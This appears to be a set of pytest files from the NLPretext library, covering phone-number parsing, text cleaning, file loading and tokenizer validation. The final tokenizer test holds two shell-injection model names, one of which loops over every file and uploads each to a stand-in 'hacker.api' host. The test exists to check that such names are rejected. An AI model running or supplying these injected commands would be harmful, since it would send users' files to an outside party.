# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import nlpretext._utils.phone_number as phone
from nlpretext._config.config import SUPPORTED_COUNTRY
def test_extract_phone_number():
    """With all supported countries enabled, overlapping candidates are returned."""
    input_str = "(541) 754-3010 is a US. Phone"
    expected = ["(541) 754-3010", "754-3010"]
    res = phone.extract_phone_numbers(input_str, countrylist=SUPPORTED_COUNTRY)
    assert sorted(res) == sorted(expected)
def test_extract_phone_number_us():
    """Restricting to US should yield only the full US-formatted number."""
    input_str = "(541) 754-3010 is a US. Phone"
    expected = ["(541) 754-3010"]
    res = phone.extract_phone_numbers(input_str, countrylist=["US"])
    assert res == expected
def test_extract_phone_number_fr():
    """French dotted notation must be recognized with the FR country list."""
    input_str = "06.00.00.00.00 is a FR Phone"
    expected = ["06.00.00.00.00"]
    res = phone.extract_phone_numbers(input_str, countrylist=["FR"])
    assert res == expected
def test_extract_phone_number_international():
    """+CC-prefixed numbers are matched via the None (international) entry."""
    input_str = "+33600000000 is an international Phone number"
    expected = ["+33600000000"]
    res = phone.extract_phone_numbers(input_str, countrylist=["US", "GB", "FR", None])
    assert res == expected
def test_phone_parser_us():
    """Parsing a US number then formatting INTERNATIONAL adds the +1 prefix."""
    input_str = "(541) 754-3010"
    expected = "+1 541-754-3010"
    p = phone.PhoneParser()
    p.parse_number(input_str, region_code="US")
    res = p.format_number("INTERNATIONAL")
    assert res == expected
def test_phone_parser_fr():
    """Parsing a FR number then formatting E164 yields the compact +33 form."""
    input_str = "0600000000"
    expected = "+33600000000"
    p = phone.PhoneParser()
    p.parse_number(input_str, region_code="FR")
    res = p.format_number("E164")
    assert res == expected
================================================
FILE: tests/test_preprocessor.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import numpy as np
import pytest
from nlpretext._config.config import SUPPORTED_COUNTRY
from nlpretext._utils.stopwords import get_stopwords
from nlpretext.basic.preprocess import (
filter_non_latin_characters,
fix_bad_unicode,
normalize_whitespace,
remove_accents,
remove_eol_characters,
remove_multiple_spaces_and_strip_text,
remove_punct,
)
from nlpretext.basic.preprocess import remove_stopwords as remove_stopwords_text
from nlpretext.basic.preprocess import (
replace_currency_symbols,
replace_emails,
replace_numbers,
replace_phone_numbers,
replace_urls,
unpack_english_contractions,
)
from nlpretext.preprocessor import Preprocessor
from nlpretext.social.preprocess import (
convert_emoji_to_text,
extract_emojis,
extract_hashtags,
extract_mentions,
remove_emoji,
remove_hashtag,
remove_html_tags,
remove_mentions,
)
from nlpretext.token.preprocess import remove_smallwords, remove_special_caracters_from_tokenslist
from nlpretext.token.preprocess import remove_stopwords as remove_stopwords_token
from nlpretext.token.preprocess import remove_tokens_with_nonletters
@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("ACV water + cinnamon + turmeric + cucumber + lemon. 👍🏻", [":thumbs_up_light_skin_tone:"]),
        ("This is a text without emojis", []),
    ],
)
def test_extract_emojis(text, expected_result):
    """Emojis are extracted as their ``:alias:`` names; no emoji yields []."""
    result = extract_emojis(text)
    assert expected_result == result
@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("I take care of my skin with @hellobody", "I take care of my skin with"),
        ("This is a text without mentions", "This is a text without mentions"),
    ],
)
def test_remove_mentions(text, expected_result):
    """@mentions are stripped (with surrounding whitespace trimmed)."""
    result = remove_mentions(text)
    assert expected_result == result
@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("I take care of my skin with @hellobody", ["@hellobody"]),
        ("This is a text without mentions", []),
    ],
)
def test_extract_mentions(text, expected_result):
    """@mentions are returned as a list; none present yields []."""
    result = extract_mentions(text)
    assert expected_result == result
@pytest.mark.parametrize(
    "text, expected_result",
    [
        (
            "This is a text with content of html tag ",
            "This is a text with content of html tag",
        ),
        ("This is a text without html tags", "This is a text without html tags"),
    ],
)
def test_remove_html_tags(text, expected_result):
    """HTML tags are removed; tag-free text is returned unchanged (trimmed)."""
    result = remove_html_tags(text)
    assert expected_result == result
@pytest.mark.parametrize(
    "tokens_list, smallwords_threshold, expected_result",
    [
        (["I", "take", "care", "of", "my", "skin"], 2, ["take", "care", "skin"]),
        (
            ["This", "text", "contains", "only", "long", "words"],
            2,
            ["This", "text", "contains", "only", "long", "words"],
        ),
    ],
)
def test_remove_smallwords(tokens_list, smallwords_threshold, expected_result):
    """Tokens no longer than the threshold are dropped from the list."""
    result = remove_smallwords(tokens_list, smallwords_threshold)
    assert expected_result == result
@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("this is a #hashtag in the middle of the text", ["#hashtag"]),
        ("#this is a hashtag in the beginning of the text", ["#this"]),
        ("this is a hashtag in the end of the #text", ["#text"]),
        ("this is a text with no hashtag", []),
        ("this is a text with #many #hashtags", ["#many", "#hashtags"]),
    ],
)
def test_extract_hashtags(text, expected_result):
    """Hashtags are extracted wherever they appear; none present yields []."""
    result = extract_hashtags(text)
    assert expected_result == result
@pytest.mark.parametrize(
    "text, expected_result",
    [
        ("this is a #hashtag in the middle of the text", "this is a in the middle of the text"),
        (
            "#this is a hashtag in the beginning of the text",
            "is a hashtag in the beginning of the text",
        ),
        ("this is a hashtag in the end of the #text", "this is a hashtag in the end of the"),
        ("this is a text with no hashtag", "this is a text with no hashtag"),
        ("this is a text with #many #hashtags", "this is a text with"),
    ],
)
def test_remove_hashtag(text, expected_result):
    """Hashtags are removed wherever they appear; whitespace is normalized."""
    result = remove_hashtag(text)
    assert expected_result == result
@pytest.mark.parametrize(
    "text, expected_filtered_text",
    [
        (
            "كلمات Learn 3 Arabic كلمات words EASILY- Vocabulary #1 تعلم ٣ جديدة",
            "Learn 3 Arabic words EASILY Vocabulary 1",
        )
    ],
)
def test_filter_non_latin_characters(text, expected_filtered_text):
    """Non-latin script (here Arabic) and punctuation are filtered out."""
    result = filter_non_latin_characters(text)
    assert expected_filtered_text == result
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("hello world", "hello world"),
        ("\n hello world ", "hello world"),
        ("----- hello\tworld *****", "hello world"),
        ("hello-world", "hello-world"),
        ("hello - world", "hello world"),
    ],
)
def test_remove_multiple_spaces_and_strip_text(input_str, expected_str):
    """Runs of whitespace/separators collapse to one space; edges are stripped."""
    result = remove_multiple_spaces_and_strip_text(input_str)
    np.testing.assert_string_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("\nhello world", " hello world"),
        ("hello\nworld", "hello world"),
        ("hello world\n", "hello world "),
    ],
)
def test_remove_eol_characters(input_str, expected_str):
    """Newlines are replaced by single spaces (positions preserved, no strip)."""
    result = remove_eol_characters(input_str)
    np.testing.assert_string_equal(result, expected_str)
def test_remove_tokens_with_nonletters():
    """Tokens containing digits are dropped; purely alphabetic tokens remain."""
    input_tokens = ["foo", "bar", "124", "34euros"]
    expected_output = ["foo", "bar"]
    result = remove_tokens_with_nonletters(input_tokens)
    np.testing.assert_array_equal(result, expected_output)
def test_remove_special_caracters_from_tokenslist():
    """Punctuation-only tokens are removed; mixed tokens like "'s" survive."""
    input_tokens = ["foo", "bar", "---", "'s", "#"]
    expected_output = ["foo", "bar", "'s"]
    result = remove_special_caracters_from_tokenslist(input_tokens)
    np.testing.assert_array_equal(result, expected_output)
def test_get_stopwords():
    """Each supported language must return a non-empty stopword list."""
    languages_to_test = ["fr", "en", "ga", "zh"]
    for lang in languages_to_test:
        result = get_stopwords(lang)
        assert len(result) > 0 and isinstance(result, list)
@pytest.mark.parametrize(
    "input_tokens, lang, expected_output",
    [(["I", "like", "this", "song", "very", "much", "!"], "en", ["I", "song", "!"])],
)
def test_remove_stopwords_tokens(input_tokens, lang, expected_output):
    """English stopwords are removed from a token list; punctuation kept."""
    result = remove_stopwords_token(input_tokens, lang)
    np.testing.assert_array_equal(result, expected_output)
@pytest.mark.parametrize(
    "input_text, lang, custom_stopwords, ignored_stopwords, expected_output",
    [
        ("I like this song very much !", "en", None, None, "I song !"),
        ("Can I get a beer?", "en", None, None, "Can I beer ?"),
        ("Je vous recommande ce film !", "fr", None, None, "Je recommande film !"),
        ("je vous recommande ce film !", "fr", None, None, "recommande film !"),
        ("Quiero una cerveza, por favor.", "es", None, None, "Quiero cerveza, favor."),
        ("je vous recommande ce film !", "fr", ["recommande"], None, "film !"),
        ("Quiero una cerveza, por favor.", "es", None, ["una"], "Quiero una cerveza, favor."),
        ("je vous recommande ce film !", "fr", ["recommande"], ["je vous"], "je vous film !"),
        (
            "je vous recommande ce film !",
            "fr",
            ["recommande"],
            ["recommande ce film"],
            "recommande ce film !",
        ),
    ],
)
def test_remove_stopwords_text(
    input_text, lang, custom_stopwords, ignored_stopwords, expected_output
):
    """Stopword removal honors language, custom additions and ignored phrases."""
    result = remove_stopwords_text(input_text, lang, custom_stopwords, ignored_stopwords)
    np.testing.assert_array_equal(result, expected_output)
@pytest.mark.parametrize(
    "input_text, lang, custom_stopwords, expected_output",
    [
        ("I like this song very much !", "en", ["song"], "I !"),
        (
            "Je vous recommande ce film la scène de fin est géniale !",
            "fr",
            ["film", "scène"],
            "Je recommande fin géniale !",
        ),
    ],
)
def test_remove_custom_stopwords_text(input_text, lang, custom_stopwords, expected_output):
    """Custom stopwords are removed on top of the language's default list."""
    result = remove_stopwords_text(input_text, lang, custom_stopwords)
    np.testing.assert_array_equal(result, expected_output)
def test_remove_accents():
    """Accented characters are transliterated to their ASCII base letters."""
    input_str = "éèëêàù"
    expected_str = "eeeeau"
    result = remove_accents(input_str)
    np.testing.assert_string_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("Les augmentations de rémunérations", "Les augmentations de rémunérations"),
        (
            "rénover l'enquête publique pour en faire un vrai outil d'aménagement du territoire et de dialogue social",
            "rénover l'enquête publique pour en faire un vrai outil d'aménagement du territoire et de dialogue social",
        ),
        (
            "Limitations de vitesse et sécurité routière",
            "Limitations de vitesse et sécurité routière",
        ),
        ("Pour un nouveau contrat citoyen", "Pour un nouveau contrat citoyen"),
        (
            "Développer les démarches de budget participatif dans les collectivités et associer les citoyens"
            " dans la réalisation des projets",
            "Développer les démarches de budget participatif dans les collectivités et associer les citoyens"
            " dans la réalisation des projets",
        ),
        ("proportienelle", "proportienelle"),
        ("Pour plus de démocratie participative", "Pour plus de démocratie participative"),
        ("Transparence de la vie public", "Transparence de la vie public"),
        ("Egalité devant les infractions routières", "Egalité devant les infractions routières"),
    ],
)
def test_fix_bad_unicode(input_str, expected_str):
    """Well-formed unicode text must pass through fix_bad_unicode unchanged."""
    result = fix_bad_unicode(input_str)
    np.testing.assert_string_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [(" foo ", "foo"), ("  foo   bar  ", "foo bar")],
)
def test_normalize_whitespace(input_str, expected_str):
    """Leading/trailing whitespace is stripped; inner runs collapse to one space."""
    result = normalize_whitespace(input_str)
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("I can't tell how we've done.", "I can not tell how we have done."),
        ("You're fired. She's nice.", "You are fired. She's nice."),
        ("Let's go!", "Let us go!"),
        ("You've been missing", "You have been missing"),
        ("I'm sure you're leaving", "I am sure you are leaving"),
        ("We'll survive.", "We will survive."),
    ],
)
def test_unpack_english_contractions(input_str, expected_str):
    """Common contractions expand; ambiguous "She's" is deliberately left alone."""
    result = unpack_english_contractions(input_str)
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        (
            "Wan't to contribute to NLPretext? read https://github.com/artefactory/NLPretext/blob/master/CONTRIBUTING.md"
            " first",
            "Wan't to contribute to NLPretext? read *URL* first",
        ),
        (
            "If you go to http://internet.org, you will find a website hosted by FB.",
            "If you go to *URL*, you will find a website hosted by FB.",
        ),
        ("Ishttps://internet.org/ available?", "Is*URL* available?"),
        ("mailto:john.doe@artefact.com", "*URL*"),
    ],
)
def test_replace_urls(input_str, expected_str):
    """URLs (http, https, mailto, even mid-word) are replaced by *URL*."""
    result = replace_urls(input_str)
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("my email:john.doe@artefact.com", "my email:*EMAIL*"),
        ("v543143@nwytg.net is a temporary email", "*EMAIL* is a temporary email"),
        ("our emails used to be name.surname@artefact.is", "our emails used to be *EMAIL*"),
    ],
)
def test_replace_emails(input_str, expected_str):
    """Email addresses are replaced by the *EMAIL* placeholder."""
    result = replace_emails(input_str)
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("mon 06: 0601020304", "mon 06: *PHONE*"),
        ("mon 06: 06.01.02.03.04", "mon 06: *PHONE*"),
        ("call me at +33601020304", "call me at *PHONE*"),
        ("call me at +33 6 01 02 03 04", "call me at *PHONE*"),
        ("call me at +33 601 020 304", "call me at *PHONE*"),
        (
            "if this unit test doesn't work, call 3615 and says 'HELP'",
            "if this unit test doesn't work, call *PHONE* and says 'HELP'",
        ),
        ("(541) 754-0000 is a US. Phone", "*PHONE* is a US. Phone"),
        ("+1-541-754-0000 is an international Phone", "*PHONE* is an international Phone"),
        ("+1-541-754-0000 Dialed in the US", "*PHONE* Dialed in the US"),
        ("+1-541-754-0000 Dialed from Germany", "*PHONE* Dialed from Germany"),
    ],
)
def test_replace_phone_numbers(input_str, expected_str):
    """National and international numbers across SUPPORTED_COUNTRY become *PHONE*."""
    result = replace_phone_numbers(
        input_str,
        replace_with="*PHONE*",
        method="detection",
        country_to_detect=SUPPORTED_COUNTRY,
    )
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("123, 3 petits chats", "*NUMBER*, *NUMBER* petits chats"),
        ("Give me 45bucks!", "Give me *NUMBER*bucks!"),
        ("call me at +33601020304", "call me at *NUMBER*"),
    ],
)
def test_replace_numbers(input_str, expected_str):
    """Digit runs are replaced by *NUMBER*, even inside words."""
    result = replace_numbers(input_str)
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, param, expected_str",
    [
        ("Give me 23$", None, "Give me 23USD"),
        ("Give me 23£", None, "Give me 23GBP"),
        ("Give me 23 £", None, "Give me 23 GBP"),
        ("Give me 23 €", None, "Give me 23 EUR"),
        (
            "¥ is both japanese yen and Chinese Renminbi",
            "*CUR*",
            "*CUR* is both japanese yen and Chinese Renminbi",
        ),
    ],
)
def test_replace_currency_symbols(input_str, param, expected_str):
    """Symbols map to ISO codes by default, or to an explicit replacement string."""
    result = replace_currency_symbols(input_str, replace_with=param)
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, param, expected_str",
    [
        ("Seriously...", None, "Seriously   "),
        ("Seriously?", None, "Seriously "),
        ("Seriously ?", None, "Seriously  "),
        ("Seriously???", None, "Seriously   "),
        ("Seriously?!", None, "Seriously  "),
        ('"Seriously"', None, " Seriously "),
        ("Seriously:", None, "Seriously "),
        ("Seriously;", None, "Seriously "),
        ("'Seriously'", None, " Seriously "),
        ("'Seriously'", ".,;", "'Seriously'"),
        ("Seriously.,.", ".,;", "Seriously   "),
        ("Seriously...", ".,;", "Seriously   "),
        ("Seriously.!.", ".,;", "Seriously ! "),
        ("john.doe@artefact.com", ".,;", "john doe@artefact com"),
        ("john.doe@artefact.com", None, "john doe artefact com"),
        ("john-doe@artefact.com", None, "john doe artefact com"),
    ],
)
def test_remove_punct(input_str, param, expected_str):
    """Punctuation becomes spaces; ``marks`` restricts which characters count."""
    result = remove_punct(input_str, marks=param)
    np.testing.assert_equal(result, expected_str)
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("⚽👌", ""),
        ("🎅🏿⌚", ""),
        ("🥖🍷🇫🇷", ""),
        ("✊", ""),
        ("Save 🐼 and 🐟", "Save  and "),
    ],
)
def test_remove_emoji(input_str, expected_str):
    """Emojis are removed entirely; the length check guards against leftovers."""
    result = remove_emoji(input_str)
    assert len(result) == len(expected_str)
    assert result == expected_str
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        ("⚽️👌", ":soccer_ball::OK_hand:"),
        ("🎅🏿⌚", ":Santa_Claus_dark_skin_tone::watch:"),
        ("🥖🍷🇫🇷", ":baguette_bread::wine_glass::France:"),
        ("✊", ":raised_fist:"),
    ],
)
def test_convert_emoji_to_text(input_str, expected_str):
    """Emojis are converted in place to their ``:alias:`` textual names."""
    result = convert_emoji_to_text(input_str)
    np.testing.assert_equal(result, expected_str)
def test_custom_preprocess():
    """A piped Preprocessor must equal applying the same functions in order."""
    # Given
    text = "Some text with @mentions and #hashtags"
    preprocessor = Preprocessor()
    preprocessor.pipe(remove_hashtag)
    preprocessor.pipe(remove_mentions)
    expected_result = remove_hashtag(text)
    expected_result = remove_mentions(expected_result)
    # When
    result = preprocessor.run(text)
    # Then
    assert expected_result == result
@pytest.mark.parametrize(
    "input_str, expected_str",
    [
        (
            "Some text with @mentions and    whitespaces and #hashtags",
            "Some text with and whitespaces and",
        ),
        ("@twitteruser ✊", ""),
        ("", ""),
    ],
)
def test_apply_preprocessor(input_str, expected_str):
    """The default Preprocessor pipeline strips mentions, hashtags, emojis, spaces."""
    # Given
    preprocessor = Preprocessor()
    # When
    result = preprocessor.run(input_str)
    # Then
    assert expected_str == result
================================================
FILE: tests/test_textloader.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="attr-defined"
from pathlib import Path
from unittest.mock import MagicMock, patch
try:
import dask.bag as db
import dask.dataframe as dd
except ImportError as e:
raise ImportError("please install dask: pip install dask[complete]") from e
try:
import pandas as pd
except ImportError as e:
raise ImportError("please install pandas: pip install pandas") from e
import pytest
from nlpretext.preprocessor import Preprocessor
from nlpretext.textloader import TextLoader
from pandas.testing import assert_frame_equal
# pylint: disable=protected-access
@patch("dask.bag.read_text")
def test__read_text_txt_dask(mock_read_text):
    """Dask-backed txt reading strips trailing whitespace into a one-column dataframe."""
    # Given
    text_column = "text"
    encoding = "utf-8"
    files_path = "some_path/to_read.txt"
    mock_read_text.return_value = db.from_sequence(["This is a text \n", "This is another text \n"])
    expected_frame = pd.DataFrame({text_column: ["This is a text", "This is another text"]})
    expected_result = dd.from_pandas(expected_frame, npartitions=2)
    # When
    loader = TextLoader(file_format="txt", encoding=encoding, text_column=text_column)
    actual_result = loader._read_text_txt(files_path)
    # Then: path and encoding forwarded untouched; rows match after materialization
    mock_read_text.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute().reset_index(drop=True))
@patch("pandas.read_fwf")
def test__read_text_txt_pandas(mock_read_text):
    """Pandas-backed txt reading calls read_fwf on the absolute path with one full-width column."""
    # Given
    files_path = "some_path/to_read.txt"
    text_column = "text"
    encoding = "utf-8"
    mock_read_text.return_value = pd.DataFrame(
        {text_column: ["This is a text", "This is another text"]}
    )
    expected_result = pd.DataFrame({text_column: ["This is a text", "This is another text"]})
    # When
    loader = TextLoader(
        file_format="txt",
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    actual_result = loader._read_text_txt(files_path)
    # Then: colspecs=[(None, None)] means "one column spanning the full line"
    mock_read_text.assert_called_once_with(
        str(Path(files_path).absolute()), encoding=encoding, colspecs=[(None, None)]
    )
    assert_frame_equal(expected_result, actual_result.reset_index(drop=True))
@patch("nlpretext._utils.daskloader.dd")
def test__read_text_json_dask(mock_read):
    """Dask-backed json reading keeps only the configured text column."""
    # Given
    text_column = "text"
    encoding = "utf-8"
    files_path = "some_path/to_read.json"
    text_ddf = dd.from_pandas(
        pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
        npartitions=2,
    )
    mock_read.read_json.return_value = text_ddf
    expected_result = text_ddf[[text_column]]
    # When
    loader = TextLoader(file_format="json", encoding=encoding, text_column=text_column)
    actual_result = loader._read_text_json(files_path)
    # Then
    mock_read.read_json.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute())
@patch("nlpretext._utils.pandasloader.read_json")
def test__read_text_json_pandas(mock_read):
    """Pandas-backed json reading delegates to pandasloader.read_json with path and encoding."""
    # Given — fixture now uses a .json path and "json" format; the original used
    # ".txt"/"txt" here, which contradicted the JSON reader under test (copy-paste slip).
    files_path = "some_path/to_read.json"
    file_format = "json"
    encoding = "utf-8"
    text_column = "text"
    dummy_instance = TextLoader(
        file_format=file_format,
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    # When
    dummy_instance._read_text_json(files_path)
    # Then: loader forwarded the path and encoding unchanged
    mock_read.assert_called_once_with(files_path, encoding=encoding)
@patch("dask.dataframe.read_csv")
def test__read_text_csv_dask(mock_read_csv):
    """Dask-backed csv reading keeps only the configured text column."""
    # Given
    text_column = "text"
    encoding = "utf-8"
    files_path = "some_path/to_read.csv"
    text_ddf = dd.from_pandas(
        pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
        npartitions=2,
    )
    mock_read_csv.return_value = text_ddf
    expected_result = text_ddf[[text_column]]
    # When
    loader = TextLoader(file_format="csv", encoding=encoding, text_column=text_column)
    actual_result = loader._read_text_csv(files_path)
    # Then
    mock_read_csv.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute())
@patch("nlpretext._utils.pandasloader.read_csv")
def test__read_text_csv_pandas(mock_read):
    """Pandas-backed csv reading delegates to pandasloader.read_csv with path and encoding."""
    # Given — fixture now uses a .csv path and "csv" format; the original used
    # ".txt"/"txt" here, which contradicted the CSV reader under test (copy-paste slip).
    files_path = "some_path/to_read.csv"
    file_format = "csv"
    encoding = "utf-8"
    text_column = "text"
    dummy_instance = TextLoader(
        file_format=file_format,
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    # When
    dummy_instance._read_text_csv(files_path)
    # Then: loader forwarded the path and encoding unchanged
    mock_read.assert_called_once_with(files_path, encoding=encoding)
@patch("dask.dataframe.read_parquet")
def test__read_text_parquet_dask(mock_read_parquet):
    """Dask-backed parquet reading keeps only the configured text column."""
    # Given
    text_column = "text"
    encoding = "utf-8"
    files_path = "some_path/to_read.parquet"
    text_ddf = dd.from_pandas(
        pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
        npartitions=2,
    )
    mock_read_parquet.return_value = text_ddf
    expected_result = text_ddf[[text_column]]
    # When
    loader = TextLoader(file_format="parquet", encoding=encoding, text_column=text_column)
    actual_result = loader._read_text_parquet(files_path)
    # Then
    # NOTE(review): this only asserts what TextLoader forwards; dask's real
    # read_parquet has no `encoding` kwarg — verify against the loader implementation.
    mock_read_parquet.assert_called_once_with(files_path, encoding=encoding)
    assert_frame_equal(expected_result.compute(), actual_result.compute())
@patch("nlpretext._utils.pandasloader.read_parquet")
def test__read_text_parquet_pandas(mock_read):
    """Pandas-backed parquet reading delegates to pandasloader.read_parquet with path and encoding."""
    # Given — fixture now uses a .parquet path and "parquet" format; the original used
    # ".txt"/"txt" here, which contradicted the Parquet reader under test (copy-paste slip).
    files_path = "some_path/to_read.parquet"
    file_format = "parquet"
    encoding = "utf-8"
    text_column = "text"
    dummy_instance = TextLoader(
        file_format=file_format,
        use_dask=False,
        encoding=encoding,
        text_column=text_column,
    )
    # When
    dummy_instance._read_text_parquet(files_path)
    # Then: loader forwarded the path and encoding unchanged
    mock_read.assert_called_once_with(files_path, encoding=encoding)
@pytest.mark.parametrize(
    "files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised",
    [
        ("text_file1.json", None, None, True, None, "json", None),
        ("text_file2.json", "json", None, True, None, "json", None),
        ("text_file3.csv", None, "utf-8", True, None, "csv", None),
        ("text_file4.csv", None, None, False, None, "csv", None),
        ("text_file3.parquet", None, "utf-8", True, None, "parquet", None),
        ("text_file4.parquet", None, None, False, None, "parquet", None),
        ("text_file5.pdf", "pdf", None, False, None, "csv", "Format not handled"),
        ("text_file6.txt", None, None, False, Preprocessor(), "txt", None),
        (
            "text_file8.txt",
            None,
            None,
            False,
            MagicMock(),
            "txt",
            "Only NLPretext preprocessors can be specified",
        ),
    ],
)
# Decorators apply bottom-up: mock args below are ordered innermost-first
# (check_text_file_format first, Preprocessor.run last).
@patch("nlpretext.preprocessor.Preprocessor.run", return_value="This is a text", autospec=True)
@patch("nlpretext.textloader.TextLoader._read_text_json")
@patch("nlpretext.textloader.TextLoader._read_text_txt")
@patch("nlpretext.textloader.TextLoader._read_text_csv")
@patch("nlpretext.textloader.TextLoader._read_text_parquet")
@patch("nlpretext.textloader.check_text_file_format")
def test_read_text(
    mock_check_text_file_format,
    mock__read_text_parquet,
    mock__read_text_csv,
    mock__read_text_txt,
    mock__read_text_json,
    mock_run,
    files_path,
    file_format,
    encoding,
    compute_to_pandas,
    preprocessor,
    expected_format,
    raised,
):
    """End-to-end check of TextLoader.read_text: format dispatch, optional
    preprocessing, optional compute-to-pandas, and error paths.

    `raised` is a regex matched against the ValueError message; when None,
    the happy path is asserted instead.
    """
    # Given
    text_column = "text"
    if encoding is None:
        encoding = "utf-8"
    # When no explicit format is given, read_text is expected to ask
    # check_text_file_format to infer it from the path.
    if file_format is None:
        mock_check_text_file_format.return_value = expected_format
    # Route each format name to its mocked private reader.
    mock_reader_mapping = {
        "csv": mock__read_text_csv,
        "txt": mock__read_text_txt,
        "json": mock__read_text_json,
        "parquet": mock__read_text_parquet,
    }
    expected_result = dd.from_pandas(
        pd.DataFrame({text_column: ["Text with #", "Text with double space"]}),
        npartitions=2,
    )
    mock_reader_mapping.get(expected_format).return_value = expected_result  # type: ignore
    # When
    dummy_textloader = TextLoader(
        text_column=text_column, encoding=encoding, file_format=file_format
    )
    if raised is None:
        actual_result = dummy_textloader.read_text(
            files_path, file_format, encoding, compute_to_pandas, preprocessor
        )
        # Then
        if file_format is None:
            mock_check_text_file_format.assert_called_once_with(files_path)
        mock_reader_mapping[expected_format].assert_called_once_with(files_path)
        if preprocessor is not None:
            if isinstance(preprocessor, Preprocessor):
                mock_run.assert_called()
                # NOTE(review): side_effect is assigned AFTER read_text returned —
                # this can only influence the output if the preprocessing is applied
                # lazily (dask) and only materialized by .compute() below; confirm
                # against the TextLoader implementation before reordering.
                preprocessed_texts = ["Text with", "Text with double space"]
                mock_run.side_effect = preprocessed_texts
                expected_result = dd.from_pandas(
                    pd.DataFrame({text_column: preprocessed_texts}), npartitions=2
                )
        # With compute_to_pandas=False the result is still a dask dataframe and
        # must be materialized here before comparison.
        if not compute_to_pandas:
            actual_result = actual_result.compute()
        assert_frame_equal(expected_result.compute(), actual_result)
    else:
        # Error paths: unsupported format, or a preprocessor that is not an
        # NLPretext Preprocessor instance.
        with pytest.raises(ValueError, match=raised):
            dummy_textloader.read_text(
                files_path, file_format, encoding, compute_to_pandas, preprocessor
            )
================================================
FILE: tests/test_tokenizer.py
================================================
import pytest
from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model
@pytest.mark.parametrize(
    "bad_model_name",
    [
        ("en_core_web_sm; chmod -x hacker"),
        (
            "fr_core_news_sm | for file in $(find .); "
            'do curl_command -X POST -H "Content-Type: multipart/form-data" '
            '-F "data=@${file}" https-fake://hacker.api/upload; done'
        ),
    ],
)
def test_load_spacy_model_validation(bad_model_name):
    """Shell-injection-style model names must be rejected before any install attempt."""
    with pytest.raises(LanguageNotInstalledError) as exc_info:
        _load_spacy_model(bad_model_name)
    # The offending name should be echoed back in the error for diagnosis.
    assert bad_model_name in str(exc_info.value)